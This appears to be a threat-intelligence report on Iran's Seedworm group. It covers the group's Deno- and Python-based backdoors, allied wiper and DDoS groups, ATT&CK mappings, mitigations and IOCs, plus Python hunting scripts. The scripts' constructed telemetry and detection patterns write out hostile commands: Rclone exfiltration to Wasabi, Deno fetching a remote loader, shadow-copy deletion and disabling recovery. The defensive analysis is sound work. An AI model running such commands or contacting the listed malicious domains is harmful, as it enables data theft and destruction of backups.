Threat Intelligence
The New Battlefield: Seedworm’s Silent War on Western Infrastructure
While Handala’s wiper operation made headlines, a stealthier and more dangerous campaign was already underway. Iran’s Seedworm group has quietly pre-positioned inside U.S. and Israeli critical infrastructure, and the clock is ticking.
The Quieter Campaign
When the Handala wiper operation hit Stryker Corporation on March 11, 2026, it generated global headlines. Thousands of devices wiped. Stock price in freefall. 5,000 workers sent home. It was loud by design: a psychological operation as much as a technical one.
But while that operation was unfolding, a more disciplined, more dangerous campaign was running in parallel. Seedworm was moving quietly through Western networks, deploying purpose-built backdoors and establishing persistent footholds with one goal – to be ready. This advanced persistent threat (APT) has emerged as the primary cyber espionage instrument of Iran’s Ministry of Intelligence and Security (MOIS) – the entity within the Iranian state responsible for covert operations and (more worryingly) cyberattacks on Western targets.
Iran’s current cyber posture operates on two parallel tracks. Track 1 (Handala, Druidfly, DieNet) is noisy, destructive, and highly visible: designed for psychological effect, with plausible deniability provided by hacktivist facades. Track 2 (Seedworm) is silent, patient, and persistent: designed to establish the access required for strategic, high-impact destruction when the political moment demands it.
Who Is Seedworm?
Seedworm (also tracked as MuddyWater) is a sophisticated espionage arm of Iran’s Ministry of Intelligence and Security (MOIS), active since at least 2017. Unlike the hacktivist fronts that dominate the headlines, Seedworm is a professional intelligence service: technically proficient and strategically directed.
Evolution of Targeting
| PERIOD | FOCUS |
| 2017–2023 | Concentrated focus on Middle Eastern telecommunications, oil and gas, and local government entities. |
| 2024–2025 | Expanded operations into Asia, Africa, and Europe — targeting defense and diplomatic sectors. |
| Late 2025 | Advanced social engineering: impersonated Suzanne Maloney (Brookings Institution) to target North American foreign policy experts. |
| Feb–Mar 2026 | Aggressive pivot toward North American and Israeli critical infrastructure. The current campaign. |
Seedworm’s defining operational characteristic is its “hybrid” approach: bespoke malware deployed alongside legitimate dual-use tools. Its use of Rclone, a standard open-source command-line utility for syncing data to cloud storage, as an exfiltration tool is the prime example. Because the uploads look like routine administrative activity, Seedworm complicates attribution and defeats signature-based detection. Catching it requires behavioural analysis of outbound network traffic (which hosts upload how much, to which storage providers, and which process initiated the transfer), not just signature matching.
Confirmed Breaches: February–March 2026
The primary catalyst for this surge in Iranian cyber activity is the death of Supreme Leader Ayatollah Ali Khamenei on March 1, 2026. This event shifted Iranian operational priorities from persistent espionage to immediate, high-visibility retaliation. The following organizations have been confirmed as compromised.
| TARGET | LOCATION | OBSERVED ACTIVITY |
| U.S. Bank | United States | Dindoor backdoor deployed; unauthorized network access confirmed. |
| U.S. Software Company (Israeli operations) | Israel | Dindoor deployed; attempted data exfiltration via Rclone to Wasabi cloud storage. |
| Canadian Non-profit | Canada | Dindoor deployed via Deno runtime. |
| U.S. Airport | United States | Fakeset backdoor deployed via Backblaze infrastructure. |
| U.S. NGO | United States | Fakeset deployed; potential credential harvesting observed. |
The New Malware Toolkit: Dindoor and Fakeset
The technical signature of this campaign is a deliberate step forward in evasion capability. Seedworm has re-tooled specifically to bypass the defensive posture of North American and Israeli targets, exploiting a blind spot in most enterprise security stacks: script execution inside the Deno JavaScript/TypeScript runtime, which few EDR baselines instrument.
Dindoor (Trojan.Dindoor)
- Runtime: Deno (JavaScript/TypeScript)
- Observed in: U.S. bank, Israeli operations of a U.S. software company, Canadian non-profit
- Signing certificate: “Amy Cherne”
- Why it matters: Traditional EDR and AMSI hooks were not built to monitor JavaScript/TypeScript execution inside Deno. AMSI in particular only sees engines that integrate it (PowerShell, Windows Script Host, .NET), not a standalone V8-based binary such as Deno. Because the malicious logic is a script executed by a legitimate runtime binary, file-based scanning that looks for malicious executables sees only Deno, allowing the implant to function as a persistent, low-profile access point.
Fakeset (Trojan.Fakeset)
- Runtime: Python
- Observed in: U.S. airport, U.S. NGO networks
- Payload delivery: Hosted on Backblaze S3 buckets “gitempire” and “elvenforest”
- Signing certificates: Both “Amy Cherne” and “Donald Gay”
The Attribution Linchpin: The “Donald Gay” Certificate
The “Donald Gay” signing certificate is the connective thread that ties this entire campaign to Seedworm with high confidence. This same certificate was previously used to sign Stagecomp, a downloader for the Darkcomp backdoor, both of which are firmly attributed to Seedworm / MuddyWater by multiple major industry vendors. The shared signing infrastructure across Dindoor, Fakeset, Stagecomp, and Darkcomp closes the attribution loop.
The Broader Ecosystem: Iran’s “Hacktivist” Cover
Seedworm does not operate in isolation. The Iranian state maintains a layered ecosystem of proxy actors and hacktivist fronts that provide plausible deniability while amplifying the campaign’s psychological and destructive reach. Understanding this ecosystem is essential for defenders as different groups require different defensive responses.
Destructive Wipers and Ransomware
- Druidfly (aka Homeland Justice): Specializes in high-impact wiping via BibiWiper, which destroys the master boot record (MBR). Has conducted active wiper attacks against Israeli targets.
- Handala: Data theft, ransomware, and doxxing operations. Has been leveraging the Starlink satellite network since mid-January to maintain connectivity during domestic internet shutdowns.
DDoS and Service Disruption
- DieNet: A pro-Palestinian group deploying DDoS-as-a-service against U.S. critical infrastructure in the financial, energy, and healthcare sectors.
Spear phishing and Intelligence Collection
- Damselfly (aka Charming Kitten): Sophisticated “honeytrap” and LinkedIn-based social engineering against academic researchers and defence sector personnel.
- Mantis (aka Arid Viper): Deploys Micropsia and Arid Gopher backdoors against military and government entities.
Reconnaissance and Bombing Damage Assessment
- Marshtreader (aka Agrius): Exploits CVE-2023-6895 to compromise IP cameras across Israel, providing MOIS with near-real-time bombing damage assessment (BDA), allowing Iranian military planners to visually verify kinetic strike impacts and correct targeting for subsequent waves.
Tactical Innovation: Cyber-Enabled Kinetic Warfare
The Marshtreader IP camera program represents a meaningful fusion of cyber and kinetic military operations. By hijacking civilian camera infrastructure, Iranian planners receive real-time visual confirmation of missile strike impacts, effectively turning compromised consumer devices into a battlefield reconnaissance network. Handala’s adoption of Starlink ensures psychological operations continue uninterrupted even if Iranian domestic internet infrastructure is damaged in a retaliatory strike.
Tactical Mapping (MITRE ATT&CK)
All observed behaviors across this campaign map to the MITRE ATT&CK framework. These techniques represent the specific defensive gaps that organizations — particularly those in energy, transportation, and financial services — must address immediately.
| ID | TECHNIQUE | OBSERVED BEHAVIOR |
| T1567.002 | Exfiltration to Cloud Storage | Rclone used to move data to Wasabi and Backblaze buckets. |
| T1566.001 | Spearphishing Attachment | Malicious Office docs and Brookings Institution / Suzanne Maloney lures. |
| T1485 | Data Destruction | BibiWiper deployed to overwrite MBR and wipe server disks. |
| T1190 | Exploit Public-Facing Application | CVE-2023-6895 exploited against internet-exposed IP cameras for real-time BDA (T1210, Exploitation of Remote Services, covers lateral movement inside a network, not this). |
| T1589 | Gather Victim Identity Info | Honeytraps and social engineering via LinkedIn and WhatsApp. |
| T1505.003 | Web Shell | ReGeorg web shells used for persistent access and lateral movement. |
Risk Assessment & Strategic Outlook
The current threat environment is volatile. We assess with high confidence that Iranian cyber escalation will continue and intensify throughout 2026. Iranian actors are almost certainly currently in a pre-positioned state on critical Western networks.
- Destructive Attacks Highly Likely: Iranian actors will transition from reconnaissance to wiper deployment targeting U.S. energy and utility sectors to signal regional strength and impose economic cost.
- Psychological Operations Almost Certain: Groups like Handala will escalate leak and intimidation campaigns, using partial data thefts to claim total system compromise and generate public panic disproportionate to actual damage.
- Credential Harvesting Likely: Social engineering and think-tank impersonations will continue targeting defence contractors and Middle East policy experts for long-term intelligence collection.
Detection and Mitigation Recommendations
Countering Seedworm requires a fundamentally different defensive posture than countering Handala. Where Handala’s MDM-based wiper attack demanded hardening of the identity and management planes, Seedworm demands behavioural visibility at the network and runtime level. Both are now necessary simultaneously.
Credential Security
- Enforce MFA: Mandatory multi-factor authentication for all remote access and administrative interfaces.
- Disable Legacy Auth: Eliminate legacy protocols that bypass MFA requirements.
- Conditional Access: Implement geo-blocking and device-risk-based access policies for all identity providers.
Data Protection and Exfiltration Detection
- Rclone Monitoring: Alert on execution of Rclone, WinRAR, and unauthorized 7-Zip, and do not rely on the file name alone: a renamed Rclone binary can still be recognised by its PE version metadata (OriginalFilename) and by its command-line syntax (verb, source, remote:path). Archivers stage the data; Rclone moves it out.
- Restrict Cloud Access: Block outbound traffic to Wasabi, Backblaze, and all S3-compatible cloud providers unless explicitly whitelisted.
- DLP Policies: Deploy Data Loss Prevention rules to catch large-volume outbound transfers to external storage.
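The behavioural correlation called for here and in the discussion of Seedworm’s Rclone tradecraft above, as an added example that is not code from the original report or from any vendor: it joins process-creation events with outbound flow records and raises an alert when a host uploads a bulk volume to an S3-compatible provider, or does so shortly after an Rclone-style process ran (including a renamed binary betrayed by its command-line syntax). All telemetry is constructed; host names, field names, the `svchost32.exe` path, the thresholds, and the allow-listed backup job are assumptions. The Wasabi and Backblaze B2 endpoint suffixes are the providers’ real domains.

```python
"""Behavioural hunt for Rclone-style exfiltration to S3-compatible cloud storage.

Added example. All telemetry below is constructed; field names, host names,
thresholds and the renamed-binary path are assumptions, not observed artefacts.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Real endpoint suffixes of S3-compatible providers, including the two named in
# the campaign (Wasabi, Backblaze B2). Extend with whatever your proxy logs show.
S3_COMPAT_SUFFIXES = ("wasabisys.com", "backblazeb2.com", "amazonaws.com",
                      "digitaloceanspaces.com")
BULK_THRESHOLD_BYTES = 50 * 1024 * 1024   # assumed tuning value: 50 MB per flow record
WINDOW = timedelta(minutes=30)             # assumed: process-to-flow correlation window

# Rclone verb followed by "<source> <remote>:<path>". A renamed rclone binary still
# has to use this syntax, so the command line betrays it even when the image name
# does not. The remote name needs 2+ characters so "D:" drive letters don't match.
RCLONE_CMD = re.compile(r"\b(copy|copyto|sync|move|moveto)\b\s+\S+\s+[A-Za-z0-9_-]{2,}:", re.I)

# Known-good (host, destination) pairs, e.g. a sanctioned backup job. Assumed.
ALLOWED_UPLOADS = {("SRV-DB1", "corp-backup.s3.us-east-005.backblazeb2.com")}

# Constructed Sysmon-style process events (JSON lines).
PROCESS_EVENTS = r"""
{"ts":"2026-03-10T09:01:00","host":"WS-114","user":"svc_backup","image":"C:\\Windows\\Temp\\svchost32.exe","cmdline":"svchost32.exe copy D:\\Finance wsb:q3-archive --config C:\\Users\\Public\\r.conf -q"}
{"ts":"2026-03-10T09:03:00","host":"WS-207","user":"jdoe","image":"C:\\Program Files\\7-Zip\\7z.exe","cmdline":"7z.exe a report.7z C:\\Users\\jdoe\\Documents\\report.docx"}
{"ts":"2026-03-10T11:00:00","host":"SRV-DB1","user":"dba","image":"C:\\Tools\\rclone.exe","cmdline":"rclone.exe sync D:\\Backups corp-backup:nightly"}
"""
# Constructed proxy/firewall flow records (JSON lines), bytes sent per flow.
FLOW_EVENTS = r"""
{"ts":"2026-03-10T09:05:00","host":"WS-114","dst_host":"s3.us-east-1.wasabisys.com","bytes_out":734003200}
{"ts":"2026-03-10T09:06:00","host":"WS-207","dst_host":"www.example.com","bytes_out":120000}
{"ts":"2026-03-10T11:02:00","host":"SRV-DB1","dst_host":"corp-backup.s3.us-east-005.backblazeb2.com","bytes_out":52428800}
{"ts":"2026-03-10T13:00:00","host":"WS-301","dst_host":"gitempire.s3.us-east-005.backblazeb2.com","bytes_out":2048}
"""


def _parse(jsonl):
    return [json.loads(line) for line in jsonl.strip().splitlines()]


def is_s3_compatible(hostname):
    """Label-boundary suffix match against the provider list."""
    h = hostname.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in S3_COMPAT_SUFFIXES)


def looks_like_rclone(ev):
    """True for rclone.exe by name, or for any image using rclone's remote syntax."""
    image = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return image == "rclone.exe" or bool(RCLONE_CMD.search(ev["cmdline"]))


def find_exfiltration(process_jsonl, flow_jsonl):
    """Return one alert per suspicious flow to S3-compatible storage, with reasons."""
    rclone_by_host = defaultdict(list)
    for ev in _parse(process_jsonl):
        if looks_like_rclone(ev):
            rclone_by_host[ev["host"]].append(ev)
    alerts = []
    for fl in _parse(flow_jsonl):
        if not is_s3_compatible(fl["dst_host"]):
            continue
        if (fl["host"], fl["dst_host"]) in ALLOWED_UPLOADS:
            continue                                   # sanctioned job, skip
        t = datetime.fromisoformat(fl["ts"])
        reasons = []
        if fl["bytes_out"] >= BULK_THRESHOLD_BYTES:
            reasons.append(f"bulk upload of {fl['bytes_out']} bytes")
        for ev in rclone_by_host[fl["host"]]:
            if abs(datetime.fromisoformat(ev["ts"]) - t) <= WINDOW:
                reasons.append(f"rclone-style process {ev['image']} by {ev['user']} within {WINDOW}")
                break
        if reasons:
            alerts.append({"host": fl["host"], "dst": fl["dst_host"], "ts": fl["ts"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_exfiltration(PROCESS_EVENTS, FLOW_EVENTS):
        print(alert)
```

On the sample data only WS-114 alerts, on both grounds: a 700 MB push to Wasabi within minutes of a renamed binary running `copy D:\Finance wsb:q3-archive`. The DBA’s nightly sync is suppressed by the allow-list, which is where legitimate Rclone use belongs rather than in a blanket exception for the tool. The 2 KB flow from WS-301 to the campaign’s `gitempire` bucket is not caught by volume or process correlation alone, which is why plain indicator matching on known-bad destinations remains a separate, necessary control.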
Operational Resilience
- Immutable Backups: Ensure backups are isolated from the production network and stored in an immutable format to resist wiper destruction.
- Network Segmentation: Physically or logically segment OT/ICS environments from corporate IT networks.
- Wiper Detection: Monitor for mass scheduled task creation, shadow copy deletion (vssadmin, wmic shadowcopy), deletion of backup catalogs, and attempts to disable Windows recovery, all of which typically precede wiper deployment.
- Runtime Visibility: Extend EDR monitoring to cover Deno and non-standard JavaScript/TypeScript runtimes. Most default configurations do not monitor these execution environments.
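Process-creation hunting rules for the two gaps this section and the Dindoor/Fakeset discussion above describe: a Deno or Python runtime executing a script in a way default EDR configurations rarely flag, and the shadow-copy, recovery and scheduled-task tampering that precedes a wipe. This is an added example and not the report’s or any vendor’s code; the events are constructed Sysmon-style records, and every host name, path, threshold, and the reserved `example.com` module URL are assumptions. Deno’s `-A`/`--allow-*` permission flags and its ability to run a module straight from a URL are real runtime features.

```python
"""Process-creation hunting rules for script runtimes EDR defaults rarely watch
(Deno, Python) and for wiper precursors (shadow-copy deletion, scheduled-task
bursts). Added example over constructed events; host names, paths, thresholds
and the example.com URL are assumptions for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Deno permission flags that let a script reach the network, spawn processes or
# write to disk. --allow-read alone is left out to keep local dev usage quiet.
DENO_PERMISSIVE = re.compile(r"(^|\s)(-A|--allow-all|--allow-net|--allow-run|--allow-write)(=|\s|$)")
# Deno can import and execute a module straight from a URL.
DENO_REMOTE_MODULE = re.compile(r"https?://\S+\.(ts|js|mjs)\b", re.I)
# Python fed a script from a temp/public location, or inline code via -c.
PY_SUSPICIOUS = re.compile(r"(\\(temp|programdata|public)\\[^\s\"]*\.pyw?\b|\s-c\s)", re.I)
# Classic pre-wiper steps: kill shadow copies, backup catalog, recovery boot.
SHADOW_KILL = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
    r"wbadmin(\.exe)?\s+delete\s+catalog|bcdedit(\.exe)?\s+.*recoveryenabled\s+no)", re.I)
SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)
TASK_BURST_COUNT, TASK_BURST_WINDOW = 10, timedelta(minutes=5)   # assumed tuning values


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_script_runtime(ev):
    """Flag Deno with broad permissions or a remote module, and Python run from temp/public."""
    img, cmd = basename(ev["image"]), ev["cmdline"]
    if img in ("deno.exe", "deno") and (DENO_PERMISSIVE.search(cmd) or DENO_REMOTE_MODULE.search(cmd)):
        return "deno run with broad permissions or a remote module"
    if img.startswith("python") and PY_SUSPICIOUS.search(cmd):
        return "python executing a script from a temp/public path or inline -c code"
    return None


def rule_shadow_copy(ev):
    return "shadow copy / recovery tampering" if SHADOW_KILL.search(ev["cmdline"]) else None


def hunt(events):
    """Apply per-event rules, then a per-host sliding window over schtasks /create."""
    findings, task_times = [], defaultdict(list)
    for ev in events:
        for rule in (rule_script_runtime, rule_shadow_copy):
            hit = rule(ev)
            if hit:
                findings.append({"rule": hit, "host": ev["host"], "ts": ev["ts"], "cmdline": ev["cmdline"]})
        if SCHTASKS_CREATE.search(ev["cmdline"]):
            task_times[ev["host"]].append(datetime.fromisoformat(ev["ts"]))
    for host, times in task_times.items():
        times.sort()
        for i, start in enumerate(times):
            n = sum(1 for t in times[i:] if t - start <= TASK_BURST_WINDOW)
            if n >= TASK_BURST_COUNT:
                findings.append({"rule": f"{n} scheduled tasks created within {TASK_BURST_WINDOW}",
                                 "host": host, "ts": start.isoformat(), "cmdline": ""})
                break
    return findings


def _ev(ts, host, image, cmdline):
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}


# Constructed sample telemetry: two malicious-looking runtime launches, two benign
# developer launches, two pre-wiper commands, one normal task, one 12-task burst.
SAMPLE_EVENTS = [
    _ev("2026-03-12T08:00:00", "WS-114", r"C:\Users\jdoe\AppData\Local\deno\deno.exe",
        "deno.exe run -A --no-prompt https://cdn.example.com/loader.ts"),
    _ev("2026-03-12T08:01:00", "DEV-02", r"C:\Users\dev\.deno\bin\deno.exe",
        "deno.exe run --allow-read=. build.ts"),
    _ev("2026-03-12T08:05:00", "WS-114", r"C:\Users\jdoe\AppData\Local\Programs\Python\Python312\python.exe",
        r"python.exe C:\Users\Public\update.py"),
    _ev("2026-03-12T08:06:00", "DEV-02", r"C:\Python312\python.exe", "python.exe -m pip install requests"),
    _ev("2026-03-12T08:15:00", "SRV-FS1", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    _ev("2026-03-12T08:15:05", "SRV-FS1", r"C:\Windows\System32\bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled No"),
    _ev("2026-03-12T08:30:00", "WS-207", r"C:\Windows\System32\schtasks.exe", r"schtasks.exe /create /tn Backup /tr C:\bk.cmd /sc daily"),
] + [
    _ev(f"2026-03-12T08:2{i // 6}:{(i % 6) * 10:02d}", "SRV-FS1", r"C:\Windows\System32\schtasks.exe",
        f"schtasks.exe /create /tn svc{i} /tr C:\\w.exe /sc once /st 09:00")
    for i in range(12)
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The rules are intentionally narrow: a developer running `deno run --allow-read=. build.ts` or `python -m pip` stays silent, while `deno run -A` against a remote module, Python fed a script out of `C:\Users\Public`, `vssadmin delete shadows`, `bcdedit ... recoveryenabled No`, and a dozen `schtasks /create` calls in two minutes on one file server each produce a finding. Treat the Deno rule as a starting point: in environments where Deno has no business being installed, its mere presence is the signal.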
Indicators of Compromise (IOCs): Immediate Action Is Required
Ingest all indicators below into your SIEM and Threat Intelligence Platform immediately. Any telemetry matching payloads signed by the “Donald Gay” or “Amy Cherne” certificates must be treated as a critical, high-priority escalation requiring immediate incident response.
Malware Hashes (SHA-256)
| FAMILY | SHA-256 HASH |
| Dindoor | 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 |
| Dindoor | 1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 |
| Dindoor | 2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 |
| Dindoor | 2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 |
| Dindoor | 42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f |
| Dindoor | 7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 |
| Dindoor | 7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef |
| Dindoor | b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 |
| Dindoor | bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a |
| Dindoor | c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e |
| Fakeset | 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de |
| Fakeset | 15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 |
| Fakeset | 2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 |
| Fakeset | 4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be |
| Fakeset | 64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb |
| Fakeset | 64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 |
| Fakeset | 74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d |
| Fakeset | 94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 |
| Fakeset | a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 |
| Fakeset | a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c |
| Fakeset | ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 |
| Stagecomp | 24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 |
| Stagecomp | a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 |
| Darkcomp | 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 |
| Darkcomp | 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 |
Network Indicators
| TYPE | INDICATOR |
| S3 Bucket | gitempire.s3.us-east-005.backblazeb2[.]com |
| S3 Bucket | elvenforest.s3.us-east-005.backblazeb2[.]com |
| Domain | uppdatefile[.]com |
| Domain | serialmenot[.]com |
| Domain | moonzonet[.]com |
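One way to ingest the indicators above and sweep telemetry against them, as an added example rather than code from the report: it refangs the `[.]` notation, validates SHA-256 entries so a mangled feed line is rejected instead of silently never matching, matches DNS queries on label boundaries (so `cdn.uppdatefile.com` hits while `notserialmenot.com` does not), and escalates any binary whose signer name is one of the two certificates called out above. The indicator values are the report’s own; one hash is deliberately upper-cased and one bogus line is added to exercise validation. The DNS, file and signer events, host names and paths are constructed.

```python
"""IOC ingestion and matching for the indicators listed above.

Added example. Indicators are the report's own (one hash upper-cased and one
bogus line added to exercise validation); all telemetry is constructed.
"""
import re

RAW_IOCS = """
hash|Dindoor|0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542
hash|Fakeset|077AB28D66ABDAFAD9F5411E18D26E87FE43DA1410EE8FE846BD721AB0CB52DE
hash|Stagecomp|24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14
hash|Bogus|not-a-sha256
domain|S3 bucket|gitempire.s3.us-east-005.backblazeb2[.]com
domain|S3 bucket|elvenforest.s3.us-east-005.backblazeb2[.]com
domain|Domain|uppdatefile[.]com
domain|Domain|serialmenot[.]com
domain|Domain|moonzonet[.]com
signer|Certificate|Donald Gay
signer|Certificate|Amy Cherne
"""
HASH_RE = re.compile(r"^[0-9a-f]{64}$")


def refang(value):
    """Undo common defanging so feed entries compare against live telemetry."""
    return value.strip().replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http").lower()


def load_iocs(text):
    """Return (hashes, domains, signers, rejected_lines); nothing malformed is loaded silently."""
    hashes, domains, signers, rejected = {}, {}, set(), []
    for line in text.strip().splitlines():
        kind, label, value = (p.strip() for p in line.split("|", 2))
        if kind == "hash" and HASH_RE.match(refang(value)):
            hashes[refang(value)] = label
        elif kind == "domain":
            domains[refang(value).rstrip(".")] = label
        elif kind == "signer":
            signers.add(value.strip().lower())
        else:
            rejected.append(line)
    return hashes, domains, signers, rejected


def domain_match(query, domains):
    """Exact or label-boundary suffix match: cdn.uppdatefile.com hits, notuppdatefile.com does not."""
    q = refang(query).rstrip(".")
    for d, label in domains.items():
        if q == d or q.endswith("." + d):
            return d, label
    return None


def scan(iocs, dns_events, file_events, signer_events):
    """Sweep DNS queries, file hashes and code-signing telemetry against the loaded IOCs."""
    hashes, domains, signers, _ = iocs
    hits = []
    for ev in dns_events:
        m = domain_match(ev["query"], domains)
        if m:
            hits.append({"host": ev["host"], "type": "domain", "ioc": m[0], "label": m[1], "severity": "high"})
    for ev in file_events:
        h = ev["sha256"].strip().lower()
        if h in hashes:
            hits.append({"host": ev["host"], "type": "hash", "ioc": h, "label": hashes[h], "severity": "high"})
    for ev in signer_events:                  # signer match is the critical escalation
        if ev["signer"].strip().lower() in signers:
            hits.append({"host": ev["host"], "type": "signer", "ioc": ev["signer"], "label": ev["path"], "severity": "critical"})
    return hits


# Constructed telemetry. The e3b0c442... hash is SHA-256 of empty input (benign).
DNS_EVENTS = [
    {"host": "WS-114", "query": "cdn.uppdatefile.com"},
    {"host": "WS-301", "query": "gitempire.s3.us-east-005.backblazeb2.com."},
    {"host": "WS-207", "query": "uppdatefile.com.lookalike.example"},
    {"host": "WS-207", "query": "notserialmenot.com"},
]
FILE_EVENTS = [
    {"host": "WS-114", "sha256": "0F9CF1CF8D641562053CE533AAA413754DB88E60404CAB6BBAA11F2B2491D542", "path": r"C:\Users\Public\run.exe"},
    {"host": "DEV-02", "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "path": r"C:\empty.bin"},
]
SIGNER_EVENTS = [
    {"host": "WS-301", "signer": "Donald Gay", "path": r"C:\ProgramData\svc.exe"},
    {"host": "DEV-02", "signer": "Microsoft Windows", "path": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    iocs = load_iocs(RAW_IOCS)
    print("rejected feed lines:", iocs[3])
    for hit in scan(iocs, DNS_EVENTS, FILE_EVENTS, SIGNER_EVENTS):
        print(hit)
```

Two details matter in practice. Suffix matching must respect label boundaries, otherwise a lookalike such as `uppdatefile.com.lookalike.example` or an unrelated `notserialmenot.com` produces noise or, worse, a false sense of coverage. And a feed line that fails validation should surface as rejected rather than being dropped, since a single mangled hash is the difference between an indicator you think you are matching and one you are not.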
Analyst Comments
The death of Ayatollah Ali Khamenei has fundamentally shifted the risk profile for Iranian cyber operations. We are no longer observing a standard espionage cycle. We are witnessing a nation-state in a phase of high-alert retaliation. Seedworm’s adoption of Deno-based backdoors like Dindoor and Python-based Fakeset indicates the group has specifically modernized its arsenal to evade the defensive posture of North American and Israeli targets. The discovery of these tools on critical infrastructure networks confirms that Iranian actors have already achieved a pre-positioned state. Resilience and rapid recovery capabilities will be the only effective defense against the expected surge in Iranian state-sponsored aggression.